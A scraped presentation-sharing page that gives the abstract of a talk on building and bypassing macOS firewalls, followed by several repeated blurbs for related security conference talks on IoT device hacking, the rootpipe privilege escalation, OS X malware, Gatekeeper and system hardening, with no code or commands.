"In the ever raging battle between malicious code and anti-malware tools, firewalls play an essential role. Many a malware has been generically thwarted thanks to the watchful eye of these products.
However on macOS, firewalls are rather poorly understood. Apple's documentation surrounding it's network filter interfaces is rather lacking and all commercial macOS firewalls are closed source.
This talk aims to take a peek behind the proverbial curtain revealing how to both create and 'destroy' macOS firewalls.
In this talk, we'll first dive into what it takes to create an effective firewall for macOS. Yes we'll discuss core concepts such as kernel-level socket filtering—but also how to communicate with user-mode components, install privileged code in a secure manner, and simple ways to implement self-defense mechanisms (including protecting the UI from synthetic events).
Of course any security tool, including firewalls, can be broken. After looking at various macOS malware specimens that proactively attempt to detect such firewalls, we'll don our 'gray' (black?) hats to discuss various attacks against these products. And while some attacks are well known, others are currently undisclosed and can generically bypass even today's most vigilant Mac firewalls.
But all is not lost. By proactively discussing such attacks, combined with our newly-found understandings of firewall internals, we can improve the existing status quo, advancing firewall development. With a little luck, such advancements may foil, or at least complicate the lives of tomorrow's sophisticated Mac malware!"
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
DEF CON 23
Internet of Things: Hacking 14 Devices
It is easy to find poorly designed devices with poor security, but how do the market leading devices stack up? Are they more secure than a Linux-powered rifle? This presentation documents our effort to assess the state of security of top selling Internet of Things Devices.
We procured 14 of the leading “connected home” IoT devices and tore them down, all the way from software to hardware and compared their relative security. This talk will demonstrate techniques useful for assessing any IoT device, while showing how they were applied across a wide range of devices.
Attend for stories of device rooting, SSL interception, firmware unpacking, mobile app vulnerabilities and more. Stay to find out why your favorite new gadget might just be a backdoor into your home. If you own (or are considering buying) one of the following devices, come and find out how secure it actually is!
Devices:
Dlink DCS-2132L
Dropcam Pro
Foscam FI9826W
Simplicam
Withings Baby Monitor
Ecobee
Hive
Honeywell Lyric
Nest Thermostat
Nest Protect
Control4 HC-250
Lowes Iris
Revolv
SmartThings
Samsung Smart Refrigerator (model RF28HMELBSR)
Samsung LED Smart TV (model UN32J5205AFXZA)
REASON:
The best thing about this talk is that it covers a large number of devices, all devices which are among the industry leaders for their category.
While we have published the high level findings from assessing these devices, this talk will include full technical details on how to attack each of these devices, and full tech details on any of the vulns which we found. Those details have not yet been released, and will be of interest to anyone who owns or wants to hack any of these devices.
‣ This document provides an overview of OS X malware diagnosis and analysis techniques.
‣ It discusses common infection vectors for OS X malware, such as fake installers and infected torrents.
‣ A variety of analysis techniques are presented, including checking for known malware signatures, analyzing file attributes, strings, dynamic file I/O, and network activity to help determine if a binary is malicious.
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT Meetup
Laurent Ellerbach, technical evangelist manager at Microsoft, presentation of the "Internet of (his garden) Things", explaining the technical architecture details and decisions.
[DefCon 2016] I got 99 Problems, but Little Snitch ain’t one!Synack
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
DEF CON 23
You may ask; "why would Apple add an XPC service that can create setuid files anywhere on the system - and then blindly allow any local user to leverage this service?" Honestly, I have no idea!
The undocumented 'writeconfig' XPC service was recently uncovered by Emil Kvarnhammar, who determined its lax controls could be abused to escalate one's privileges to root. Dubbed ‘rootpipe,' this bug was patched in OS X 10.10.3. End of story, right? Nope, instead things then got quite interesting. First, Apple decided to leave older versions of OS X un-patched. Then, an astute researcher discovered that the OSX/XSLCmd malware which pre-dated the disclosure, exploited this same vulnerability as a 0day! Finally, yours truly, found a simple way to side-step Apple's patch to re-exploit the core vulnerability on a fully-patched system. So come attend (but maybe leave your MacBooks at home), as we dive into the technical details XPC and the rootpipe vulnerability, explore how malware exploited this flaw, and then fully detail the process of completely bypassing Apple's patch. The talk will conclude by examining Apple’s response, a second patch, that appears to squash ‘rootpipe’…for now.
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
In comparison to Windows malware, known OS X threats are really quite lame. As an Apple user that has drank the 'Apple Juice,' I didn't think that was fair!
From novel persistence techniques, to native OS X components that can be abused to thwart analysis, this talk will detail exactly how to create elegant, bad@ss OS X malware. And since detection is often a death knell for malware, the talk will also show how OS X's native malware mitigations and 3rd-party security tools were bypassed. For example I'll detail how Gatekeeper was remotely bypassed to allow unsigned download code to be executed, how Apple's 'rootpipe' patch was side-stepped to gain root on a fully patched system, and how all popular 3rd-party AV and personal firewall products were generically bypassed by my simple proof-of-concept malware.
However, don't throw out your Macs just yet! The talk will conclude by presenting several free security tools that can generically detect or even prevent advanced OS X threats. Armed with such tools, we'll ensure that our computers are better protected against both current and future OS X malware.
So unless you work for Apple, come learn how to take your OS X malware skills to the next level and better secure your Mac at the same time!
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace is used to trace Objective-C method calls. Code snippets are provided showing examples of how to use ChaoticMarch to automate tapping buttons and entering text, as well as how Machshark and Objc_trace work.
The document discusses OS X malware analysis and provides information on:
- Common infection vectors for OS X malware including exploits and fake installers
- Persistence mechanisms like launch agents and browser extensions
- Features of OS X malware like collecting keylogs, downloads and executing files
- Steps to analyze a system for malware including checking processes, persistence and network connections
- Methods for analyzing suspicious files like code signing, hashing, strings extraction and class dumping
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
DEF CON 23
Internet of Things: Hacking 14 Devices
It is easy to find poorly designed devices with poor security, but how do the market leading devices stack up? Are they more secure than a Linux-powered rifle? This presentation documents our effort to assess the state of security of top selling Internet of Things Devices.
We procured 14 of the leading “connected home” IoT devices and tore them down, all the way from software to hardware and compared their relative security. This talk will demonstrate techniques useful for assessing any IoT device, while showing how they were applied across a wide range of devices.
Attend for stories of device rooting, SSL interception, firmware unpacking, mobile app vulnerabilities and more. Stay to find out why your favorite new gadget might just be a backdoor into your home. If you own (or are considering buying) one of the following devices, come and find out how secure it actually is!
Devices:
Dlink DCS-2132L
Dropcam Pro
Foscam FI9826W
Simplicam
Withings Baby Monitor
Ecobee
Hive
Honeywell Lyric
Nest Thermostat
Nest Protect
Control4 HC-250
Lowes Iris
Revolv
SmartThings
Samsung Smart Refrigerator (model RF28HMELBSR)
Samsung LED Smart TV (model UN32J5205AFXZA)
REASON:
The best thing about this talk is that it covers a large number of devices, all devices which are among the industry leaders for their category.
While we have published the high level findings from assessing these devices, this talk will include full technical details on how to attack each of these devices, and full tech details on any of the vulns which we found. Those details have not yet been released, and will be of interest to anyone who owns or wants to hack any of these devices.
‣ This document provides an overview of OS X malware diagnosis and analysis techniques.
‣ It discusses common infection vectors for OS X malware, such as fake installers and infected torrents.
‣ A variety of analysis techniques are presented, including checking for known malware signatures, analyzing file attributes, strings, dynamic file I/O, and network activity to help determine if a binary is malicious.
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT Meetup
Laurent Ellerbach, technical evangelist manager at Microsoft, presentation of the "Internet of (his garden) Things", explaining the technical architecture details and decisions.
[DefCon 2016] I got 99 Problems, but Little Snitch ain’t one!Synack
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
DEF CON 23
You may ask; "why would Apple add an XPC service that can create setuid files anywhere on the system - and then blindly allow any local user to leverage this service?" Honestly, I have no idea!
The undocumented 'writeconfig' XPC service was recently uncovered by Emil Kvarnhammar, who determined its lax controls could be abused to escalate one's privileges to root. Dubbed ‘rootpipe,' this bug was patched in OS X 10.10.3. End of story, right? Nope, instead things then got quite interesting. First, Apple decided to leave older versions of OS X un-patched. Then, an astute researcher discovered that the OSX/XSLCmd malware which pre-dated the disclosure, exploited this same vulnerability as a 0day! Finally, yours truly, found a simple way to side-step Apple's patch to re-exploit the core vulnerability on a fully-patched system. So come attend (but maybe leave your MacBooks at home), as we dive into the technical details XPC and the rootpipe vulnerability, explore how malware exploited this flaw, and then fully detail the process of completely bypassing Apple's patch. The talk will conclude by examining Apple’s response, a second patch, that appears to squash ‘rootpipe’…for now.
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
In comparison to Windows malware, known OS X threats are really quite lame. As an Apple user that has drank the 'Apple Juice,' I didn't think that was fair!
From novel persistence techniques, to native OS X components that can be abused to thwart analysis, this talk will detail exactly how to create elegant, bad@ss OS X malware. And since detection is often a death knell for malware, the talk will also show how OS X's native malware mitigations and 3rd-party security tools were bypassed. For example I'll detail how Gatekeeper was remotely bypassed to allow unsigned download code to be executed, how Apple's 'rootpipe' patch was side-stepped to gain root on a fully patched system, and how all popular 3rd-party AV and personal firewall products were generically bypassed by my simple proof-of-concept malware.
However, don't throw out your Macs just yet! The talk will conclude by presenting several free security tools that can generically detect or even prevent advanced OS X threats. Armed with such tools, we'll ensure that our computers are better protected against both current and future OS X malware.
So unless you work for Apple, come learn how to take your OS X malware skills to the next level and better secure your Mac at the same time!
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace is used to trace Objective-C method calls. Code snippets are provided showing examples of how to use ChaoticMarch to automate tapping buttons and entering text, as well as how Machshark and Objc_trace work.
The document discusses OS X malware analysis and provides information on:
- Common infection vectors for OS X malware including exploits and fake installers
- Persistence mechanisms like launch agents and browser extensions
- Features of OS X malware like collecting keylogs, downloads and executing files
- Steps to analyze a system for malware including checking processes, persistence and network connections
- Methods for analyzing suspicious files like code signing, hashing, strings extraction and class dumping
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
My presentation on how to use malware indicators of compromise to create rootcheck signatures for OSSEC. Explains different malware collection and analysis techniques.
This document provides an overview of Gatekeeper, Apple's built-in macOS security feature that aims to block unauthorized code from being installed or run on a user's system. It discusses how Gatekeeper works under the hood, including how it uses file quarantine attributes and the launchservices framework to check for and potentially block execution of apps from untrusted developers. The document also examines ways that Gatekeeper's protections can be bypassed or understood in more detail.
This document provides instructions for deploying Spark in high availability (HA) mode using Ansible on OpenStack. It begins with an overview of using the OpenStack client and Ansible for infrastructure automation. It then demonstrates hands-on use of the OpenStack client to create and manage resources. The document introduces Ansible concepts like playbooks, modules, roles and Galaxy before explaining how to deploy Spark in HA mode using Ansible roles and providing a link to example code.
Gatekeeper is a macOS security feature that checks if downloaded apps were signed by identified developers before allowing them to be installed. It aims to protect users by blocking unauthorized code from being installed via the internet. When an unsigned app is downloaded, Gatekeeper displays an alert to get user approval before installation. However, Gatekeeper can be bypassed if malware exploits vulnerabilities to directly download payloads without triggering the quarantine checks. While Gatekeeper prevents many threats, high-tech adversaries may still be able to bypass its protections.
This document discusses how to set up an encrypted IPsec VPN tunnel between two FreeBSD endpoints. It involves:
1. Configuring IPsec in the FreeBSD kernel and installing the ipsec-tools port.
2. Defining IPsec security policies to encrypt traffic between the endpoints in a setkey.conf file.
3. Configuring the racoon IKE daemon on each endpoint using racoon.conf files and a pre-shared key to negotiate the IPsec connection.
4. Validating that encryption is working by looking for ESP records in tcpdump output and checking the SAD tables.
Intro to the FIWARE Lab: Setting Up Your Virtual Infrastructure Using FIWARE Lab Cloud, by Fernando López.
1st FIWARE Summit, Málaga, Dec. 13-15, 2016.
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
This document provides best practices for securing Splunk configurations with SSL. It discusses Splunk's default SSL posture and the types of communication that can be encrypted with SSL. The document then provides recommendations for enabling SSL for various Splunk components like Splunkweb, forwarders, indexers, the deployment server, and more. It also discusses options for using a commercial or private certificate authority and provides an example SSL-enabled Splunk architecture.
This document summarizes an OpenStack meetup where attendees installed OpenStack using Packstack on a single node. The agenda covered installing VirtualBox and Vagrant, generating an answer file for Packstack, deploying OpenStack, and verifying the installation by creating flavors, images, networks and launching an instance. Post-installation tasks included configuring networking and the Horizon dashboard. Attendees were guided through the basic operations for a simple proof-of-concept OpenStack deployment on a single node.
This document summarizes integrating the OpenNMS network monitoring platform with modern configuration management tools like Puppet. It discusses using Puppet to provision and automatically configure nodes in OpenNMS from Puppet's configuration data. The authors provide code for pulling node data from Puppet's REST API and generating an XML file for OpenNMS to import the nodes and their configuration. They also discuss opportunities to further improve the integration by developing a Java object model for Puppet's YAML output and filtering imports based on node attributes.
.Today, criminals are using novel tecnhiques to bypass AV detecions. Manual debugging must be used to unpack malware (a hard work that is needed to reveal the original malware code). Dissecting malware allows us to understand criminals’ modus operandi, and manual analysis is always required to reveal FUD malware.
Mikhail Sosonkin discusses iOS automation primitives and tools for blackbox testing of iOS applications without developer access. He outlines static and dynamic analysis techniques using tools like IDAPro, Cycript, and Frida. Sosonkin then introduces CHAOTICMARCH, an open source framework he developed that uses Lua scripts to simulate user interactions, find UI elements, and automate testing of iOS apps through a lightweight injected module. The goal is to build a library of automated testing logic that can be run against any iOS application.
The document summarizes an OpenNMS case study presentation given at an O'Reilly Open Source conference. It provides an overview of OpenNMS capabilities for network monitoring and management and describes three specific case studies:
1) New Edge Networks, a large internet provider, uses OpenNMS to monitor over 13,000 nodes and 75,000 interfaces.
2) Hospitality Services, providing wireless internet in European hotels, uses OpenNMS to monitor over 2,300 sites with 48,000 nodes and 50,000 interfaces.
3) The Permanente Medical Group, a large health provider, uses OpenNMS to monitor over 350 clinics and doctor's offices across a centralized network.
The first shift reviews log files from the previous day and generates summary reports using various aureport commands to analyze audit statistics, failed events, and key details. The second and third shifts also run aureport commands to maintain oversight of the current day's audit statistics and events and use ausearch to investigate further if needed.
Linux Server Hardening - Steps by StepsSunil Paudel
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
Manage distributed configuration and secrets with spring cloud and vault (Spr...Andreas Falk
This document discusses managing distributed configuration and secrets with Spring Cloud and Vault. It introduces Spring Cloud Config for managing external configuration in distributed systems. Sensitive data like passwords are typically stored in application properties, exposing them to risk. Spring Cloud Config and Vault can encrypt these values. Vault is presented as a tool for secret storage and access control. It discusses authentication methods and secret backends. The document demonstrates integrating Spring Cloud and Vault to provide encrypted configuration values and automatically rotating secrets like database credentials.
IPSec provides security for IP communications by authenticating packet sources and ensuring data integrity and confidentiality. It uses the IKE protocol to securely establish encryption keys between two endpoints to enable the use of AH and ESP protocols. IPSec policies define rules for establishing Phase 1 IKE security associations for authentication and Phase 2 associations for applying encryption and other security measures to specific traffic.
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
The document discusses geolocation features in mobile apps and potential security issues. It provides an overview of how geolocation works on iOS, code examples for implementing geolocation in Swift, and discusses common classes of geolocation bugs that could compromise a user's location privacy. These include insecure network communications, insecure local storage of location data, location spoofing, collecting overly precise location data, and user interface errors.
Sydney Python Presentation (October 2010) - SplunkKelvin Nicholson
This was a presentation I gave about Splunk to the Sydney Python group in October 2010. I talked in depth about modifying Splunk for interesting added functionality.
The document provides instructions for a lab on Snort and firewall rules. It describes:
1) Setting up the virtual environment and configuring networking on the CyberOps Workstation VM.
2) Explaining the differences between firewall and IDS rules while noting their similarities, such as both having matching and action components.
3) Having students run commands to start a malware server, use Snort to monitor traffic, and download a file from the server to trigger an alert, observing the alert in the Snort log.
Attacking Oracle with the Metasploit FrameworkChris Gates
The document discusses attacking Oracle databases using Metasploit. It provides an overview of the current Metasploit support for Oracle and new support being added, including TNS and Oracle mixins to simplify interactions. It then outlines an Oracle attack methodology involving locating systems, determining version/SID, bruteforcing credentials, escalating privileges via SQL injection in default packages, manipulating data, and covering tracks. Examples are given of modules that implement each part of the methodology.
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
My presentation on how to use malware indicators of compromise to create rootcheck signatures for OSSEC. Explains different malware collection and analysis techniques.
This document provides an overview of Gatekeeper, Apple's built-in macOS security feature that aims to block unauthorized code from being installed or run on a user's system. It discusses how Gatekeeper works under the hood, including how it uses file quarantine attributes and the launchservices framework to check for and potentially block execution of apps from untrusted developers. The document also examines ways that Gatekeeper's protections can be bypassed or understood in more detail.
This document provides instructions for deploying Spark in high availability (HA) mode using Ansible on OpenStack. It begins with an overview of using the OpenStack client and Ansible for infrastructure automation. It then demonstrates hands-on use of the OpenStack client to create and manage resources. The document introduces Ansible concepts like playbooks, modules, roles and Galaxy before explaining how to deploy Spark in HA mode using Ansible roles and providing a link to example code.
Gatekeeper is a macOS security feature that checks if downloaded apps were signed by identified developers before allowing them to be installed. It aims to protect users by blocking unauthorized code from being installed via the internet. When an unsigned app is downloaded, Gatekeeper displays an alert to get user approval before installation. However, Gatekeeper can be bypassed if malware exploits vulnerabilities to directly download payloads without triggering the quarantine checks. While Gatekeeper prevents many threats, high-tech adversaries may still be able to bypass its protections.
This document discusses how to set up an encrypted IPsec VPN tunnel between two FreeBSD endpoints. It involves:
1. Configuring IPsec in the FreeBSD kernel and installing the ipsec-tools port.
2. Defining IPsec security policies to encrypt traffic between the endpoints in a setkey.conf file.
3. Configuring the racoon IKE daemon on each endpoint using racoon.conf files and a pre-shared key to negotiate the IPsec connection.
4. Validating that encryption is working by looking for ESP records in tcpdump output and checking the SAD tables.
Intro to the FIWARE Lab: Setting Up Your Virtual Infrastructure Using FIWARE Lab Cloud, by Fernando López.
1st FIWARE Summit, Málaga, Dec. 13-15, 2016.
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
This document provides best practices for securing Splunk configurations with SSL. It discusses Splunk's default SSL posture and the types of communication that can be encrypted with SSL. The document then provides recommendations for enabling SSL for various Splunk components like Splunkweb, forwarders, indexers, the deployment server, and more. It also discusses options for using a commercial or private certificate authority and provides an example SSL-enabled Splunk architecture.
This document summarizes an OpenStack meetup where attendees installed OpenStack using Packstack on a single node. The agenda covered installing VirtualBox and Vagrant, generating an answer file for Packstack, deploying OpenStack, and verifying the installation by creating flavors, images, networks and launching an instance. Post-installation tasks included configuring networking and the Horizon dashboard. Attendees were guided through the basic operations for a simple proof-of-concept OpenStack deployment on a single node.
This document summarizes integrating the OpenNMS network monitoring platform with modern configuration management tools like Puppet. It discusses using Puppet to provision and automatically configure nodes in OpenNMS from Puppet's configuration data. The authors provide code for pulling node data from Puppet's REST API and generating an XML file for OpenNMS to import the nodes and their configuration. They also discuss opportunities to further improve the integration by developing a Java object model for Puppet's YAML output and filtering imports based on node attributes.
.Today, criminals are using novel tecnhiques to bypass AV detecions. Manual debugging must be used to unpack malware (a hard work that is needed to reveal the original malware code). Dissecting malware allows us to understand criminals’ modus operandi, and manual analysis is always required to reveal FUD malware.
Mikhail Sosonkin discusses iOS automation primitives and tools for blackbox testing of iOS applications without developer access. He outlines static and dynamic analysis techniques using tools like IDAPro, Cycript, and Frida. Sosonkin then introduces CHAOTICMARCH, an open source framework he developed that uses Lua scripts to simulate user interactions, find UI elements, and automate testing of iOS apps through a lightweight injected module. The goal is to build a library of automated testing logic that can be run against any iOS application.
The document summarizes an OpenNMS case study presentation given at an O'Reilly Open Source conference. It provides an overview of OpenNMS capabilities for network monitoring and management and describes three specific case studies:
1) New Edge Networks, a large internet provider, uses OpenNMS to monitor over 13,000 nodes and 75,000 interfaces.
2) Hospitality Services, providing wireless internet in European hotels, uses OpenNMS to monitor over 2,300 sites with 48,000 nodes and 50,000 interfaces.
3) The Permanente Medical Group, a large health provider, uses OpenNMS to monitor over 350 clinics and doctor's offices across a centralized network.
The first shift reviews log files from the previous day and generates summary reports using various aureport commands to analyze audit statistics, failed events, and key details. The second and third shifts also run aureport commands to maintain oversight of the current day's audit statistics and events and use ausearch to investigate further if needed.
Linux Server Hardening - Steps by StepsSunil Paudel
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
Manage distributed configuration and secrets with spring cloud and vault (Spr...Andreas Falk
This document discusses managing distributed configuration and secrets with Spring Cloud and Vault. It introduces Spring Cloud Config for managing external configuration in distributed systems. Sensitive data like passwords are typically stored in application properties, exposing them to risk. Spring Cloud Config and Vault can encrypt these values. Vault is presented as a tool for secret storage and access control. It discusses authentication methods and secret backends. The document demonstrates integrating Spring Cloud and Vault to provide encrypted configuration values and automatically rotating secrets like database credentials.
IPSec provides security for IP communications by authenticating packet sources and ensuring data integrity and confidentiality. It uses the IKE protocol to securely establish encryption keys between two endpoints to enable the use of AH and ESP protocols. IPSec policies define rules for establishing Phase 1 IKE security associations for authentication and Phase 2 associations for applying encryption and other security measures to specific traffic.
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
The document discusses geolocation features in mobile apps and potential security issues. It provides an overview of how geolocation works on iOS, code examples for implementing geolocation in Swift, and discusses common classes of geolocation bugs that could compromise a user's location privacy. These include insecure network communications, insecure local storage of location data, location spoofing, collecting overly precise location data, and user interface errors.
Sydney Python Presentation (October 2010) - SplunkKelvin Nicholson
This was a presentation I gave about Splunk to the Sydney Python group in October 2010. I talked in depth about modifying Splunk for interesting added functionality.
The document provides instructions for a lab on Snort and firewall rules. It describes:
1) Setting up the virtual environment and configuring networking on the CyberOps Workstation VM.
2) Explaining the differences between firewall and IDS rules while noting their similarities, such as both having matching and action components.
3) Having students run commands to start a malware server, use Snort to monitor traffic, and download a file from the server to trigger an alert, observing the alert in the Snort log.
Attacking Oracle with the Metasploit FrameworkChris Gates
The document discusses attacking Oracle databases using Metasploit. It provides an overview of the current Metasploit support for Oracle and new support being added, including TNS and Oracle mixins to simplify interactions. It then outlines an Oracle attack methodology involving locating systems, determining version/SID, bruteforcing credentials, escalating privileges via SQL injection in default packages, manipulating data, and covering tracks. Examples are given of modules that implement each part of the methodology.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
This document provides an overview of Unix rootkits, including their functionality, types, usage trends, and case studies of captured rootkits. Rootkits aim to maintain access, attack other systems, and conceal evidence. They are implemented through binary, kernel, and library techniques. Case studies examine the SA binary kit, the W00tkit kernel kit, and the RK library kit to illustrate rootkit techniques and evolution over time. The document concludes that rootkits combine tools to establish hidden, persistent access and attack other machines while avoiding detection.
José Ramón Palanco is an OT security expert at ElevenPaths (Telefónica) who specializes in penetration testing, vulnerability research, and programming. The presentation covers OT protocols, an OT lab for hardware hacking and firmware analysis, industrial malware examples like Stuxnet, and projects including an industrial protocol IDS and Nmap scripts for discovering SCADA/ICS devices.
This document describes potential backdoor techniques to maintain access to systems behind different types of firewalls. It discusses placing backdoors on internal machines rather than firewall machines. Suggested backdoor methods include using ACK-only telnet, the Loki ICMP tunnel, a UDP-based daemon shell, and exploiting ports left open for non-passive FTP. Insider assistance, exploiting vulnerable external services, hijacking connections, and trojan files are also proposed for initially penetrating firewalls.
This document provides an overview of the basic function call flow for OpenSSL to establish a secure TCP connection. It discusses initializing the OpenSSL library, creating an SSL_CTX object, generating randomness, creating an SSL object for a connection, performing the TLS/SSL handshake, and reading and writing data over the encrypted connection. It also provides examples of OpenSSL code for a client application.
Esta apresentação é baseada em uma pesquisa que publiquei em 2015 que tratava de malware do tipo mach-o, e o aumento de visibilidade do macOS como novo alvo. Nesta nova pesquisa, a ideia é mostrar algumas dicas sobre internals, kernel e principais ameaças que o macOS vem enfrentando.
The document discusses using machine learning and group policy objects (GPOs) to automate prevention of ransomware. It describes how machine learning can be used to analyze network traffic patterns to detect ransomware behaviors. Indicators identified through machine learning analysis are then used as input to automatically generate and deploy GPOs across an Active Directory network to block detected ransomware threats in real-time. The approach aims to provide a more targeted and faster response than traditional signature-based antivirus solutions.
Automated prevention of ransomware with machine learning and gposPriyanka Aash
This talk will highlight a signature-less method to detect malicious behavior before the delivery of the ransomware payload can infect the machine. The ML-driven detection method is coupled with the automated generation of a Group Policy Object and in this way we demonstrate an automated way to take action and create a policy based on observed IOC’s detected in a zero-day exploit pattern.
( Source : RSA Conference USA 2017)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
My presentation from SecTor 2014 on analyzing the sophisticated Careto malware with memory forensics & Volatility
Video here: http://2014.video.sector.ca/video/110388398
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
The document discusses various methods for hardening Linux security, including securing physical and remote access, addressing top vulnerabilities like weak passwords and open ports, implementing security policies, setting BIOS passwords, password protecting GRUB, choosing strong passwords, securing the root account, disabling console programs, using TCP wrappers, protecting against SYN floods, configuring SSH securely, hardening sysctl.conf settings, leveraging open source tools like Mod_Dosevasive, Fail2ban, Shorewall, and implementing security at the policy level with Shorewall.
Finding target for hacking on internet is now easierDavid Thomas
Finding target on internet for penetration testing involves searching internet using google or using Google Hacking/Dorking. There are google hacking queries available on internet, according to ethical hacking researcher of International Institute of Cyber Security it is the main source of passive attacks on internet. This whole process of finding target on internet using GHDB is automated using python based framework named as Katana framework.
The document discusses techniques for bypassing security controls and gaining persistent access to a secured remote desktop server. It proposes infecting a client's workstation, stealing RDP credentials, and using various tools to bypass firewalls, application whitelisting, and other defenses in order to install malware and establish command and control of the target server. Specific bypass methods involve abusing Microsoft Word macros, exploiting Windows services, installing kernel drivers, and manipulating TCP source ports. The presentation demonstrates new attack tools and methods for pentesters and warns blue teams of challenges in detecting such advanced intrusions.
The detail architecture of the most relevant consumer drones will be introduced, continuing with the communications protocol between the pilot (app in the smartphone or remote controller) and the drone. Manual reverse engineering on the binary protocol used for this communication will lead to identifying and understanding all the commands from each of the drones, and later inject commands back.
Learning Objectives:
1: Understand whenever a protocol between drone and pilot is secure.
2: Learn about a new reverse engineering methodology for these protocols.
3: Review a set of good practices to secure the environment surrounding a drone.
(Source: RSA Conference USA 2018)
This document summarizes a paper on packet filtering as a basic network security tool. It defines packet filtering as controlling network access by analyzing packets and allowing or blocking them based on header information like source/destination addresses and ports. It then discusses how packet filters work by examining these header fields, provides an example Linux configuration, and outlines some limitations like inability to inspect payloads or track connection state. It concludes by describing common applications of packet filtering like ingress/egress rules to block spoofed addresses and unoffered services.
Tony Godfrey gave a presentation on Kali Linux at the Ohio HTCIA 2014 Spring Conference. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It contains many security tools for information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, and more. The presentation demonstrated how to use various command line tools in Kali Linux like nmap, nmap, rlogin, and showed how to use Metasploit within msfconsole.
The document discusses the Meterpreter payload and its advantages over traditional command shells. Meterpreter runs by injecting itself into vulnerable processes, allowing it to avoid detection. It has a full command shell and extensions that allow flexible post-exploitation activities like privilege escalation and maintaining stealth. Meterpreter commands demonstrated include keylogging, packet sniffing, and modifying file timestamps to evade forensic analysis.
Similar to Fire & Ice: Making and Breaking macOS Firewalls (20)
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
Key Discussion Pointers:
1. Introduction to Data Privacy
- What is data privacy
- Privacy laws around the globe
- DPDPA Journey
2. Understanding the New Indian DPDPA 2023
- Objectives
- Principles of DPDPA
- Applicability
- Rights & Duties of Individuals
- Principals
- Legal implications/penalties
3. A practical approach to DPDPA compliance
- Personal data Inventory
- DPIA
- Risk treatment
The Verizon Breach Investigation Report (VBIR) is an annual report analyzing cybersecurity incidents based on real-world data. It categorizes incidents and identifies emerging trends, threat actors, motivations, attack vectors, affected industries, common attack patterns, and recommendations. Each report provides the latest insights and data to give organizations a global perspective on evolving cyber threats.
The document summarizes the top 10 cybersecurity risks presented to the board of directors of a manufacturing company. It discusses each risk such as insider threats, cloud security, ransomware attacks, third party risks, and data security. For each risk, it provides the current posture in terms of controls, compliance level, and planned improvements. The CISO and other leaders such as the managing director, finance director, and chief risk officer attended the presentation.
Simplifying data privacy and protection.pdfPriyanka Aash
1) Data is growing exponentially which increases the risk and impact of data breaches, while compliance requirements are also becoming more stringent.
2) IBM Security Guardium helps customers address this by discovering, classifying, and protecting sensitive data across platforms and simplifying compliance.
3) It detects threats in real-time, increases data security accuracy, and reduces the time spent on audits and issue remediation, helping customers minimize the impact of potential data breaches and address local compliance requirements.
Generative AI and Security (1).pptx.pdfPriyanka Aash
Generative AI and Security Testing discusses generative AI, including its definition as a subset of AI focused on generating content similar to human creations. The document outlines the evolution of generative AI from artificial neural networks to modern models like GPT, GANs, and VAEs. It provides examples of different types of generative AI like text, image, audio, and video generation. The document proposes potential uses of generative AI like GPT for security testing tasks such as malware generation, adversarial attack simulation, and penetration testing assistance.
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
